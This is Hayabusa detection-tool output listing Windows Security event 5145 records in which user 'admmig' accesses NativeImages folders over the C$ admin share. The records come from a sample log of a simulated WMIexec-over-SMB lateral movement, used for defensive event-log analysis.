2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
